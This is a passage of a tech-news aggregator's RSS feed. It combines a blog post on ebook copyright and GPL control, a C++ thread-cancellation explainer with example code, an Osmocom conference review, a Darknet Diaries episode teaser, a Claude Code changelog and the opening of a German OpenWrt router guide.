<content:encoded><![CDATA[<p>When I have a moment, I’ll try to tally up the responses that I got to <!-- raw HTML omitted -->“An ethical question involving ebooks”<!-- raw HTML omitted -->and see if there are any interesting patterns based on self-identified generational markers.  Obviously, this is <strong>not</strong> a properly controlled survey, so the results aren’t going to mean much, but it is interesting that some fairly passionately written comments came from folks who self-identified as coming from generations that broke with the common stereotypes of their respective demographic groups.   If I were going to commission a study, one thing that I would almost certainly do is to ask pose a similar question about music and mp3’s, and do have the surveys asking the question about ebooks first, and half the surveys asking the questions about music first.  It would be interesting to see if (a) there is a difference in attitudes between music and books, and (b) whether the order of the questions might influence the answers or not.</p>
<p>A number of poeple have asked me about the author’s name and the title of the books/series involved.  I deliberately didn’t include that information, for a number of reasons.  First of all, I don’t believe idenifying the author/books/character involved is relevant to the question at hand, and in fact, might be distracting.  Secondly, given the many comments, some of them quite passionate, I don’t think it would be fair to drag her name into the discussion without her permission first.  I will say that the author does have a fairly extensive internet presence, and has apparently gotten a lot of questions about said character, and in fact whether those books would be made into ebooks.   It’s been made quite clear that while those books were successful, they weren’t <em>that</em> successful, and so from an economic point of view, she chooses to write books that she (and her publishers) feel will be more economically viable.   Because there will likely be no further books published containing this character, it is very unlikely that the publisher will reprint the original series of books — and when asked about whether they would be made available in ebook form, her response was effectively “it’s up to the publisher”,  Apparently she has worked with a number of publishers, and while publisher X hasn’t been willing to publish her books in ebook form, publisher Y has.  Furthermore, it seems that her contracts apparently delegate all decisions about how her books will be published, and whether a large Major Big City Law Firm with Fangs (aka MBCLFF) will go after copyright infringers to her publishers and her agent (who is a lawyer at said MBCLFF, and who could presumably inflict major Hurt on copyright infringers that curry the lawyer’s disfavor).   I don’t know if this is true, or just her way of managing her relationship with her fans by disclaiming all responsibility about publication forms and enforcement decisions to others — but some authors do make such choices, if they are much more interested in the writing and storytelling end of things than the business side of things.</p>
<p>Which brings up an interesting question with respect to copyright enforcement.   It’s pretty obvious that many people will give different answers to the question relating to how much deference should be given to copyrights depending on whether they are owned by The Struggling Author versus whether they are owned by The Big Media Corporate Monolith, with many more allowances given if the question is framed as being primarily about the former rather than the latter.   Another way in which how you frame the question radically changes the outcome depends on whether the focus is on <em>making sure the author (and/or his surviving widow/widower/children) get paid</em> or whether the focus is on <em>control of one’s works</em>.   If you believe the primary justification is an economic one, then that leads to a series of ethical conclusions — the most obvious of which is that if it doesn’t result in a direct (or perhaps indirect) monetary loss to the author, there should not be a moral or ethical problem.   There might be some question as to whether devaluing the secondary market might discourage the sale of new books, and hence indirectly harm the author sufficiently that this should be a concern, but those issues can be worked out.</p>
<p>If however, you believe the primary issue at hand is one of <strong>control</strong>, a very different set of issues have to get factored into the conversation. For example, what if the author was ashamed of a book or series, and wants it to go quietly out of print, and hopefully disappear. How should that be weighed against fans who disagree with the author and who love the series? What is the right balance? For those who argue that the author’s wishes should be sacrosanct — should we move things more in that direction? What if all texts lived in DRM’ed, encrypted containers, and electronic readers had to ask permission of a central authorization server for the text could be displayed. This would allow the author to, after the fact, disable anyone from reading his or her works, if for some reason the author so desired it. Would that be a good thing? If not — and I hope most authors would agree this would be horrific power to give copyright holders — then it’s clear that author’s moral rights as creators should not be entirely sacrosanct, and that the society also has some claims on preserving its culture, and that once a book has been published and becomes part of the culture, society should have some claim on that book as part of culture. Whether that means that copyright terms should be 14 years or 20 years as opposed to whenever the Disney corporation feels like paying off more legislators to extend copyright terms is one way that question could be asked. Another is whether society should have the right to say that if after some number of years where a work has been abandoned for commercial exploitation, whether it should automatically enter the public domain. There are no obvious answers here.</p>
<p>The final point that I want to make, which may be fairly controversial amongst the Open Source programmers in the room, is that if you believe that copyright should be fundamentally be about economic arguments of “no harm, no foul”, that this is in direct contradiction with the belief that lawsuits should be used in order to enforce the GPL. After all, <em>the conditions imposed by the GPL are fundamentally about control, not about economic issues</em>. Consider — if someone uses the Busybox project in an embedded device — especially if no changes has been made to the code — who has been harmed, economically? No harm, no foul, right? Or if someone uses GPLv3 code in a firmware which is protected by a digital signature — sure, it means that end users who want to modify the firmware and then use it to enhace/extend the device won’t be able to do so. But how does that economically harm the author of the GPLv3 code? Fundamentally, Copyleft schemes are all about extending control over how the code can be used. Hence, if you are an Free Software programmer who cheers on the activities of the SFLC, or who firmly believes that no one should be allowed to mix firmware which is not shipped with source with <strong>your</strong> GPL’ed software, it is completely and profoundly hypocritical to say, “F*ck the author’s wishes; if it’s not available in the from <strong>I</strong> want, I should be able to make a derived work to transfer the work into a form that I want.” What if the author is a luddite who hates eBooks and firmly believes and wants to enforce that their works should never be made available in eBook form. How is that fundamentally different from a Free Software Acolyte saying that because they abhor non-free firmware, and don’t want allow their code to be shipped alongside binary-only firmware?</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cancellation and C++ Exceptions]]></title>
<description><![CDATA[Cancellation and C++ Exceptions

In NPTL thread cancellation is implemented using exceptions.  This does not in general conflict with the mixed use of cancellation and exceptions in C++ programs.  This works just fine.  Some people, though, write code which doesn't behave as they expect.  This is...]]></description>
<link>https://tsecurity.de/de/3500898/unix-server/cancellation-and-c-exceptions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500898/unix-server/cancellation-and-c-exceptions/</guid>
<pubDate>Fri, 08 May 2026 22:58:48 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Cancellation and C++ Exceptions</h1>

<p>In NPTL thread cancellation is implemented using exceptions.  This does not in general conflict with the mixed use of cancellation and exceptions in C++ programs.  This works just fine.  Some people, though, write code which doesn't behave as they expect.  This is a short example:</p>

<pre>
#include &lt;cstdlib&gt;
#include &lt;iostream&gt;
#include &lt;pthread.h&gt;

static pthread_mutex_t m = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t c = PTHREAD_COND_INITIALIZER;

static void *tf (void *)
{
  try {
    ::pthread_mutex_lock(&amp;m);
    ::pthread_cond_wait (&amp;c, &amp;m);
  } catch (...) {
    // do something
  }
}

int main ()
{
  pthread_t th;
  ::pthread_create (&amp;th, NULL, tf, NULL);
  // do some work; simulate using sleep
  std::cout &lt;&lt; "Wait a bit" &lt;&lt; std::endl;
  sleep (1);
  // cancel the child thread
  ::pthread_cancel (th);
  // wait for it
  ::pthread_join (th, NULL);
}
</pre>

<p>The problem is in function <tt>tf</tt>.  This function contains a catch-all clause which does not rethrow the exception.  This is possible to expect but should really never happen in any code.  The rules C++ experts developed state that catch-all cases must rethrow.  If not then strange things can happen since one doesn't always know exactly what exceptions are thrown.  The code above is just one example.  Running it will produce a segfault:</p>

<pre>
$ ./test
Wait a bit
FATAL: exception not rethrown
Aborted (core dumped)
</pre>

<p>The exception used for cancellation is special, it cannot be ignored.  This is why the program aborts.</p>

<p>Simply adding the rethrow will cure the problem:</p>

<pre>
@@ -13,6 +13,7 @@
     ::pthread_cond_wait (&amp;c, &amp;m);
   } catch (...) {
     // do something
+    throw;
   }
 }
 
</pre>

<p>But this code might not have the expected semantics.  Therefore the more general solution is to change the code as such:</p>

<pre>
@@ -1,6 +1,7 @@
 #include &lt;cstdlib&gt;
 #include &lt;iostream&gt;
 #include &lt;pthread.h&gt;
+#include &lt;cxxabi.h&gt;
 
 static pthread_mutex_t m = PTHREAD_MUTEX_INITIALIZER;
 static pthread_cond_t c = PTHREAD_COND_INITIALIZER;
@@ -11,6 +12,8 @@
   try {
     ::pthread_mutex_lock(&amp;m);
     ::pthread_cond_wait (&amp;c, &amp;m);
+  } catch (abi::__forced_unwind&amp;) {
+    throw;
   } catch (...) {
     // do something
   }
</pre>

<p>The header <tt>cxxabi.h</tt> comes with gcc since, I think, gcc 4.3.  It defines a special tag which corresponds to the exception used in cancellation.  This exception is not catchable, as already said, which is why it is called <tt>__forced::unwind</tt>.</p>

<p>That's all.  That is needed.  This code can easily be added to existing code, maybe even with a single hidden use:</p>

<pre>
#define CATCHALL catch (abi::__forced_unwind&amp;) { throw; } catch (...)
</pre>

<p>This macro can be defined predicated on the gcc version and the platform.</p>

<p>I still think it is better to always rethrow the execption, though.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OsmoDevCon 2017 Review]]></title>
<description><![CDATA[After the public user-oriented OsmoCon 2017, we also recently had the
6th incarnation of our annual contributors-only Osmocom Developer Conference: The OsmoDevCon 2017.
This is a much smaller group, typically about 20 people, and is limited
to actual developers who have a past record of contribut...]]></description>
<link>https://tsecurity.de/de/3500745/unix-server/osmodevcon-2017-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500745/unix-server/osmodevcon-2017-review/</guid>
<pubDate>Fri, 08 May 2026 22:53:54 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>After the public user-oriented OsmoCon 2017, we also recently had the
6th incarnation of our annual contributors-only <a class="reference external" href="https://osmocom.org/projects/osmo-dev-con/wiki/OsmoDevCon">Osmocom Developer Conference</a>: The <a class="reference external" href="https://osmocom.org/projects/osmo-dev-con/wiki/OsmoDevCon2017">OsmoDevCon 2017</a>.</p>
<p>This is a much smaller group, typically about 20 people, and is limited
to actual developers who have a past record of contributing to any of
the many <a class="reference external" href="https://osmocom.org/projects">Osmocom projects</a>.</p>
<p>We had a large number of presentation and discussions.  In fact, so
large that the schedule of talks extended from 10am to midnight on some
days.  While this is great, it also means that there was definitely too
little time for more informal conversations, chatting or even actual
work on code.</p>
<p>We also have such a wide range of topics and scope inside Osmocom, that
the traditional <em>ad-hoch scheduling</em> approach no longer seems to be
working as it used to.  Not everyone is interested in (or has time for)
all the topics, so we should group them according to their topic/subject
on a given day or half-day.  This will enable people to attend only
those days that are relevant to them, and spend the remaining day in an
adjacent room hacking away on code.</p>
<p>It's sad that we only have OsmoDevCon once per year.  Maybe that's
actually also something to think about.  Rather than having 4 days once
per year, maybe have two weekends per year.</p>
<p>Always in motion the future is.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Could Lovable’s automatic 10% pay raise be the cure for toxic cultures?]]></title>
<description><![CDATA[Stockholm-based vibe coding platform Lovable it is offering employees an automatic 10% raise as a way to sidestep classic corporate politics.]]></description>
<link>https://tsecurity.de/de/3497113/it-nachrichten/could-lovables-automatic-10-pay-raise-be-the-cure-for-toxic-cultures/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497113/it-nachrichten/could-lovables-automatic-10-pay-raise-be-the-cure-for-toxic-cultures/</guid>
<pubDate>Thu, 07 May 2026 20:48:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Stockholm-based vibe coding platform Lovable it is offering employees an automatic 10% raise as a way to sidestep classic corporate politics.]]></content:encoded>
</item>
<item>
<title><![CDATA[Surviving High Uncertainty in Logistics with MARL]]></title>
<description><![CDATA[Part 2. Building scale-invariant agents that seamlessly change contexts
The post Surviving High Uncertainty in Logistics with MARL appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3489497/ai-nachrichten/surviving-high-uncertainty-in-logistics-withmarl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3489497/ai-nachrichten/surviving-high-uncertainty-in-logistics-withmarl/</guid>
<pubDate>Tue, 05 May 2026 14:03:30 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Part 2. Building scale-invariant agents that seamlessly change contexts</p>
<p>The post <a href="https://towardsdatascience.com/surviving-high-uncertainty-in-logistics-with-marl/">Surviving High Uncertainty in Logistics with MARL</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Only Cure For This Malware Is to Throw Your Router in the Trash 🔌 Episode 174: Pacific Rim]]></title>
<description><![CDATA[Author: Jack Rhysider - Bewertung: 49x - Views:555 For six years, Sophos fought a secret cyber war against a state-backed hacking group targeting its firewalls. This forced Sophos to drastically change tactics to defend their customers and firewalls.

Was it ethical? Was it effective? They disrup...]]></description>
<link>https://tsecurity.de/de/3488638/it-security-video/the-only-cure-for-this-malware-is-to-throw-your-router-in-the-trash-episode-174-pacific-rim/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488638/it-security-video/the-only-cure-for-this-malware-is-to-throw-your-router-in-the-trash-episode-174-pacific-rim/</guid>
<pubDate>Tue, 05 May 2026 09:31:49 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Jack Rhysider - Bewertung: 49x - Views:555 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/QzI9ig-DFoc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>For six years, Sophos fought a secret cyber war against a state-backed hacking group targeting its firewalls. This forced Sophos to drastically change tactics to defend their customers and firewalls.<br />
<br />
Was it ethical? Was it effective? They disrupted nine zero-day attacks, exposed who was hacking them, and forced the hackers to change tactics. But at what cost?<br />
<br />
You have to listen to one of the most audacious corporate cyber defenses ever conducted.<br />
<br />
Visit https://darknetdiaries.com/episode/174/ for a list of sources, full transcripts, and to listen to all episodes.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.121]]></title>
<description><![CDATA[What's changed

Added alwaysLoad option to MCP server config — when true, all tools from that server skip tool-search deferral and are always available
Added claude plugin prune to remove orphaned auto-installed plugin dependencies; plugin uninstall --prune cascades
Added a type-to-filter search ...]]></description>
<link>https://tsecurity.de/de/3487666/downloads/v21121/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487666/downloads/v21121/</guid>
<pubDate>Tue, 05 May 2026 02:02:06 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>alwaysLoad</code> option to MCP server config — when <code>true</code>, all tools from that server skip tool-search deferral and are always available</li>
<li>Added <code>claude plugin prune</code> to remove orphaned auto-installed plugin dependencies; <code>plugin uninstall --prune</code> cascades</li>
<li>Added a type-to-filter search box to <code>/skills</code> so you can find a skill in long lists without scrolling</li>
<li>PostToolUse hooks can now replace tool output for all tools via <code>hookSpecificOutput.updatedToolOutput</code> (previously MCP-only)</li>
<li>Fullscreen mode: typing into the prompt no longer jumps scroll back to the bottom after you've scrolled up to read earlier output</li>
<li>Dialogs that overflow the terminal are now scrollable with arrow keys, PgUp/PgDn, home/end, and mouse wheel in both fullscreen and non-fullscreen modes</li>
<li>Clicking any line of a long URL that wraps across rows in fullscreen mode now opens the full URL</li>
<li>SDK and <code>claude -p</code>: <code>CLAUDE_CODE_FORK_SUBAGENT=1</code> now works in non-interactive sessions</li>
<li><code>--dangerously-skip-permissions</code> no longer prompts for writes to <code>.claude/skills/</code>, <code>.claude/agents/</code>, and <code>.claude/commands/</code></li>
<li><code>/terminal-setup</code> now enables iTerm2's "Applications in terminal may access clipboard" setting so <code>/copy</code> works, including from tmux</li>
<li>MCP servers that hit a transient error during startup now auto-retry up to 3 times instead of staying disconnected</li>
<li>The terminal tab session title is now generated in your configured <code>language</code> setting</li>
<li>Claude.ai connectors with the same upstream URL are now deduplicated instead of appearing as duplicates</li>
<li>Vertex AI: support X.509 certificate-based Workload Identity Federation (mTLS ADC)</li>
<li>Faster startup after upgrading: removed the Recent Activity panel from the release-notes splash</li>
<li>LSP diagnostic summaries now expand on click/ctrl+o and show the expand hint</li>
<li>SDK: <code>mcp_authenticate</code> now supports <code>redirectUri</code> for custom scheme completion and claude.ai connectors</li>
<li>OpenTelemetry: added <code>stop_reason</code>, <code>gen_ai.response.finish_reasons</code>, and <code>user_system_prompt</code> (gated behind <code>OTEL_LOG_USER_PROMPTS</code>) to LLM request spans</li>
<li>[VSCode] Voice dictation now respects the <code>accessibility.voice.speechLanguage</code> setting when no Claude Code language is configured</li>
<li>[VSCode] <code>/context</code> now opens a native token usage dialog</li>
<li>Fixed unbounded memory growth (multi-GB RSS) when processing many images in a session</li>
<li>Fixed <code>/usage</code> leaking up to ~2GB of memory on machines with large transcript histories</li>
<li>Fixed memory leak when long-running tools fail to emit a clear progress event</li>
<li>Fixed Bash tool becoming permanently unusable when the directory Claude was started in is deleted or moved mid-session</li>
<li>Fixed <code>--resume</code> crashing on startup in external builds</li>
<li>Fixed <code>--resume</code> failing on large sessions when a transcript line was corrupted by an unclean shutdown — the corrupt line is now skipped</li>
<li>Fixed <code>thinking.type.enabled is not supported</code> error when using Bedrock application inference profile ARNs</li>
<li>Fixed Microsoft 365 MCP OAuth failing with duplicate or unsupported <code>prompt</code> parameter</li>
<li>Fixed scrollback duplication when pressing Ctrl+L or triggering a redraw in non-fullscreen mode on tmux, GNOME Terminal, Windows Terminal, and Konsole</li>
<li>Fixed claude.ai MCP connectors silently disappearing when the connector-list fetch hits a transient auth error at startup</li>
<li>Fixed "Always allow" rules for built-in tools in remote sessions not surviving worker restarts</li>
<li>Fixed <code>NO_PROXY</code> not being respected for all HTTP clients when set via <code>managed-settings.json</code> under the native build</li>
<li>Fixed managed settings approval prompt exiting the session even when accepted — now applies settings and continues</li>
<li>Fixed <code>/usage</code> returning "rate limited" after a stale OAuth token — now refreshes automatically</li>
<li>Fixed invalid legacy enum values in <code>settings.json</code> invalidating the entire settings file</li>
<li>Fixed <code>/usage</code> dialog content being clipped when no-flicker mode is off</li>
<li>Fixed <code>/focus</code> showing "Unknown command" when the fullscreen renderer is off — now explains how to enable it</li>
<li>Fixed embedded grep/find/rg shell wrappers failing when the running binary is deleted mid-session — now falls back to installed tools</li>
<li>Reduced peak file descriptor usage during <code>find</code> in the Bash tool on large directory trees</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ihr Router kann viel mehr: Mit OpenWrt holen Sie alles raus]]></title>
<description><![CDATA[OpenWrt ist ein Linux-basiertes Betriebssystem für Router und andere eingebettete Systeme, auf denen Linux grundsätzlich installiert werden kann. Die Software ersetzt die herstellereigene Firmware vollständig und stellt ein frei konfigurierbares System bereit. 



Im Gegensatz zu klassischen Rout...]]></description>
<link>https://tsecurity.de/de/3483312/it-nachrichten/ihr-router-kann-viel-mehr-mit-openwrt-holen-sie-alles-raus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3483312/it-nachrichten/ihr-router-kann-viel-mehr-mit-openwrt-holen-sie-alles-raus/</guid>
<pubDate>Sun, 03 May 2026 08:31:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://openwrt.org/" target="_blank" rel="noreferrer noopener">OpenWrt</a> ist ein Linux-basiertes Betriebssystem für Router und andere eingebettete Systeme, auf denen Linux grundsätzlich installiert werden kann. Die Software ersetzt die herstellereigene Firmware vollständig und stellt ein frei konfigurierbares System bereit. </p>



<p>Im Gegensatz zu klassischen Router-Betriebssystemen arbeitet OpenWrt mit einem beschreibbaren Dateisystem und integriertem Paketmanagement. Dadurch erweitert sich der Router funktional zu einer Plattform, auf der sich zahlreiche Dienste nach Bedarf installieren und betreiben lassen.</p>



<p>Das System läuft auf einer Vielzahl unterschiedlicher Hardwarearchitekturen. <a href="https://www.amazon.de/s?k=openwrt+router&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Neben klassischen Consumer-Routern</a> unterstützt OpenWrt ARM- und MIPS-Plattformen sowie x86-Systeme. Diese breite Unterstützung ermöglicht einen geräteunabhängigen Betrieb mit identischer Oberfläche und vergleichbarer Konfiguration.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69f6eba178a9d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/Der-beste-Router.png?w=1200" alt="Der beste Router" class="wp-image-3059996" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Foundry mit Material von Fritz und Telekom</p></div>



<h2 class="wp-block-heading toc">Architektur und Funktionsprinzip</h2>



<p>OpenWrt stellt kein fest definiertes Funktionspaket bereit, sondern ein modulares System. Nach der Installation steht ein minimales Basissystem zur Verfügung, das Routing, Netzwerkdienste und Firewall-Regeln abbildet. Weitere Funktionen lassen sich über Pakete nachinstallieren. Dazu zählen DNS-Server, VPN-Dienste, Monitoring-Werkzeuge oder Werbeblocker.</p>



<p>Die Verwaltung erfolgt über die Weboberfläche “LuCI” sowie optional über die Kommandozeile. Beide Wege greifen auf dieselbe Konfigurationsbasis zu. Änderungen wirken unmittelbar auf das System und lassen sich jederzeit anpassen. Dadurch behalten Sie die vollständige Kontrolle über alle Netzwerkfunktionen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69f6eba17975c"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/shells_terminals_begriffe_linux_6.jpg?quality=50&amp;strip=all" alt="SSH ist flexibel und nicht nur als CLI-Shell zu erreichen: Zum Datenaustausch eignet sich der Midnight Commander, der SSH-Verbindungen als „Shell- Verbindung“ anbietet." class="wp-image-3044515" width="800" height="291" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>SSH ist flexibel und nicht nur als CLI-Shell zu erreichen: Zum Datenaustausch eignet sich der Midnight Commander, der SSH-Verbindungen als „Shell- Verbindung“ anbietet.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading toc">Hardwareanforderungen und Geräteauswahl</h2>



<p>OpenWrt läuft auf einer großen Bandbreite an Geräten. Voraussetzung bleibt die Unterstützung durch das Projekt. Vor der Installation muss geprüft werden, <a href="https://openwrt.org/supported_devices" target="_blank" rel="noreferrer noopener">ob ein Router kompatibel ist</a>. Im Heimnetz oder in kleinen Unternehmen kommen häufig günstige Consumer-Router zum Einsatz. Viele Modelle lassen sich direkt mit OpenWrt flashen. Entsprechende Geräte sind breit verfügbar, auch <a href="https://www.amazon.de/s?k=openwrt+router&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">im Handel finden sich passende Modelle</a>.</p>



<p>Ein weiterer Ansatz nutzt vorhandene Hardware im Haushalt oder Büro. Ältere Router, darunter auch frühere Gerätegenerationen der Fritzbox, lassen sich oft weiterverwenden. OpenWrt ersetzt dabei die veraltete Firmware und stellt aktuelle Funktionen sowie Sicherheitsupdates bereit. Dadurch verlängert sich die Nutzungsdauer deutlich und vorhandene Hardware erhält neue Einsatzmöglichkeiten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69f6eba17a67b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-01.png?w=1200" alt="Openwrt bietet viele Möglichkeiten" class="wp-image-3111024" width="1200" height="821" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Installation und erste Schritte</h2>



<p>Die Installation erfolgt modellabhängig. In vielen Fällen reicht ein Firmware-Update über die Weboberfläche des Herstellers. Dabei wird ein spezielles Image eingespielt, das OpenWrt enthält. Nach einem Neustart übernimmt das System die Kontrolle über das Gerät. Nach der Installation stellt OpenWrt eine Standardkonfiguration bereit. Der Zugriff erfolgt über die IP-Adresse 192.168.1.1. Zu Beginn ist kein Passwort gesetzt, weshalb unmittelbar ein Zugang konfiguriert werden muss.</p>



<p>In der Praxis folgt danach die grundlegende Netzwerkkonfiguration. Dazu zählen die WAN-/Internet-Anbindung über DHCP oder PPPoE, die Einrichtung von LAN-Segmenten sowie die Aktivierung des WLANs. OpenWrt stellt hierfür bereits vordefinierte Schnittstellen bereit, die sich anpassen lassen.</p>



<p>Ein typisches Szenario nutzt OpenWrt als zentralen Router hinter einem bestehenden Internetanschluss. Nach der Installation wird die WAN-Internet-Schnittstelle auf DHCP gesetzt. Das Gerät erhält automatisch eine IP-Adresse vom vorhandenen Router oder Modem. </p>



<p>Anschließend erfolgt die WLAN-Konfiguration. OpenWrt erkennt vorhandene Funkmodule und stellt separate Schnittstellen für 2,4 GHz und 5 GHz bereit. Sie definieren SSIDs, wählen Verschlüsselung und setzen Zugriffsschlüssel. WPA2 oder WPA3 stehen dabei ebenfalls zur Verfügung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69f6eba17b183"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-02.png?w=1200" alt="Openwrt einrichten" class="wp-image-3111025" width="1200" height="455" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Praxisbeispiel im Heimnetz</h2>



<p>Ergänzend lässt sich die Firewall anpassen. OpenWrt verwendet standardmäßig getrennte Zonen für LAN und WAN/Internet. Regeln können erweitert werden, um Portfreigaben oder interne Dienste abzubilden. VLANs lassen sich direkt über die Netzwerkschnittstellen konfigurieren, wodurch sich separate Netze für Gäste oder IoT-Geräte realisieren lassen.</p>



